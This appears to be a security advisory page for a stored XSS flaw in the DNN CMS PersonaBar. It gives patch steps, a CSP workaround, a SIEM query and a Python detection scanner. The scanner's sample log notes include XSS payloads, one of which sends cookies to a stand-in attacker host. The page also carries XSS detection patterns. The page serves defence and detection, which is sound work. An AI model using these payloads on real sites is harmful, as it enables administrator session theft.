CVE-2026-24836
📋 TL;DR
This vulnerability allows stored cross-site scripting (XSS) attacks in DNN CMS. Attackers with extension permissions can inject malicious scripts into log notes that execute when administrators view the PersonaBar interface. Affects DNN installations from version 9.0.0 up to (but not including) 9.13.10 and 10.2.0.
💻 Affected Systems
- DNN Platform (formerly DotNetNuke)
📦 What is this software?
Dotnetnuke by Dnnsoftware
⚠️ Risk & Real-World Impact
Worst Case
Administrator account compromise leading to full CMS takeover, data theft, or website defacement through stored XSS payloads in administrative interface.
Likely Case
Session hijacking of administrator accounts, credential theft, or unauthorized administrative actions through client-side script execution.
If Mitigated
Limited impact if PersonaBar access is restricted to a few trusted accounts and a strict Content Security Policy is enforced. Browser-side XSS filters have been removed from most current browsers and do not stop stored XSS served from the application's own origin, so unprotected administrator sessions remain at risk.
🎯 Exploit Status
Exploitation requires authenticated access with extension permissions. The vulnerability is in how rich text in log notes is rendered in the PersonaBar.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.13.10 or 10.2.0
Vendor Advisory: https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-2g5g-hcgh-q3rp
Restart Required: Yes
Instructions:
1. Back up your DNN installation and database.
2. Download version 9.13.10 or 10.2.0 from the official DNN repository.
3. Follow the DNN upgrade documentation for your version.
4. Restart the application pool in IIS.
5. Verify that the PersonaBar displays log notes without script execution.
🔧 Temporary Workarounds
Disable PersonaBar access for non-essential users
- Restrict PersonaBar access to only essential administrators to reduce the attack surface.
- Configure role permissions in DNN to limit PersonaBar access.
Implement Content Security Policy (CSP)
- Add CSP headers that block inline and third-party script execution in the PersonaBar. A policy that allows 'unsafe-inline' gives no protection against this bug.
- Add the CSP header via web.config or IIS settings, starting in report-only mode, because the PersonaBar and many modules rely on inline scripts that an enforcing policy will block until nonces or hashes are in place.
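The following web.config fragment is an added example of the CSP workaround; it is not DNN project configuration and has not been validated against a specific DNN release. It assumes the DNN site's web.config, the usual IIS customHeaders mechanism, and a reporting endpoint at /csp-report that you provide yourself (the path is an assumption). It ships in report-only mode on purpose: switch the header name to Content-Security-Policy only once the report stream shows the PersonaBar working with nonce- or hash-based inline script allowances.

```xml
<!-- Added example: merge into <configuration><system.webServer> of the DNN site's web.config. -->
<system.webServer>
  <httpProtocol>
    <customHeaders>
      <!-- Report-only first: DNN's PersonaBar and many modules use inline scripts,
           and script-src 'self' (which is what blocks the injected <script> payload)
           also blocks those until they are moved to nonces or hashes. -->
      <add name="Content-Security-Policy-Report-Only"
           value="default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'; report-uri /csp-report" />
      <!-- Once the report stream is clean, replace the header above with an enforcing one:
           <add name="Content-Security-Policy" value="...same directives..." /> -->
    </customHeaders>
  </httpProtocol>
</system.webServer>
```

Check the result with an administrator session open in the PersonaBar: the browser's developer console lists every inline or external script the policy would have blocked, and those are the scripts that need a nonce or hash before the header can be switched to enforcing. Do not add 'unsafe-inline' to script-src to make the warnings disappear; that removes the only part of the policy that stops the stored payload.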
🧯 If You Can't Patch
- Implement strict input validation and sanitization for all rich text fields in extensions
- Monitor and audit log note entries for suspicious script-like content
🔍 How to Verify
Check if Vulnerable:
Check DNN version in Host Settings > Basic Settings. If version is between 9.0.0-9.13.9 or 10.0.0-10.1.x, the system is vulnerable.
Check Version:
Check Host Settings in DNN admin interface or examine web.config for version information
Verify Fix Applied:
After patching, verify that the version shows 9.13.10 or 10.2.0. In a non-production environment, create a log note containing a harmless script tag (for example one that only calls alert) and confirm that it is rendered inert in the PersonaBar rather than executed.
📡 Detection & Monitoring
Log Indicators:
- Unusual log note entries containing script tags or JavaScript code
- Multiple log entries from same extension in short time
Network Indicators:
- PersonaBar requests whose log-note or other rich-text fields carry HTML tags, event-handler attributes, or entity- or URL-encoded equivalents
- Administrator browsers making requests to unfamiliar external hosts while the PersonaBar is open (possible cookie or token exfiltration)
SIEM Query (placeholder source and field names; adjust to your log schema, and note that literal matches miss entity- or URL-encoded payloads):
source="dnn_logs" AND (message="*<script*" OR message="*javascript:*" OR message="*onerror=*" OR message="*onload=*")
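The literal SIEM match above is a reasonable first pass, but it misses payloads that arrive HTML-entity-encoded or URL-encoded and ignores event-handler attributes beyond the two listed. The script below is an added example of the detection logic run over constructed log notes; it is not DNN code, does not read the DNN database, and its indicator set and sample entries are assumptions for illustration. Feed it (entry_id, note_text) pairs exported from your own logging.

```python
"""
Scan DNN-style log notes for script-like content.

Added example for this advisory page; it is not DNN code and does not read the
DNN database. Input is a list of (entry_id, note_text) pairs pulled from your own
log export. The indicator patterns and the sample entries are constructed.
"""
import html
import re
from urllib.parse import unquote

# Indicator patterns (an assumed starting set, not a vendor signature list).
# Matching runs on decoded text, so entity- or URL-encoded payloads are caught too.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    "javascript_uri": re.compile(r"javascript\s*:", re.IGNORECASE),
    "event_handler": re.compile(
        r"\bon(?:error|load|click|mouseover|mouseenter|focus|blur|keydown|keyup"
        r"|input|change|submit|toggle|animationstart|pointerover)\s*=",
        re.IGNORECASE,
    ),
    "active_element": re.compile(r"<\s*(?:svg|iframe|object|embed)\b", re.IGNORECASE),
}


def normalize(text: str) -> str:
    """Repeatedly URL-decode and HTML-entity-decode until the text stops changing.

    A naive '*<script>*' search misses '&lt;script&gt;' and '%3Cscript%3E';
    bounded decoding (payloads are sometimes double-encoded) closes that gap.
    """
    current = text
    for _ in range(3):
        decoded = html.unescape(unquote(current))
        if decoded == current:
            break
        current = decoded
    return current


def scan_log_notes(entries):
    """Return {entry_id: sorted list of indicator names} for entries that match."""
    findings = {}
    for entry_id, note in entries:
        decoded = normalize(note)
        names = sorted(name for name, pat in INDICATORS.items() if pat.search(decoded))
        if names:
            findings[entry_id] = names
    return findings


# Constructed sample log notes (not real DNN data).
SAMPLE_ENTRIES = [
    ("101", "Module installed: Contact Form 2.1"),
    ("102", "Release notes: <script>fetch('https://attacker.example/?c='+document.cookie)</script>"),
    ("103", "See &lt;img src=x onerror=alert(1)&gt; for details"),
    ("104", "Changelog: %3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"),
    ("105", "Upgrade to version 9.13.10 once available"),
    ("106", '<a href="javascript:void(0)">click</a>'),
]

if __name__ == "__main__":
    for entry_id, names in scan_log_notes(SAMPLE_ENTRIES).items():
        print(f"entry {entry_id}: {', '.join(names)}")
```

Entries 103 and 104 are the ones a plain `*<script>*` match would miss: 103 is entity-encoded and uses an event handler instead of a script tag, 104 is URL-encoded. Entry 105 shows why the event-handler pattern uses an explicit list of handler names rather than `on\w+=`: ordinary words such as "once" would otherwise produce noise. Tune the lists to the extensions actually installed on your site.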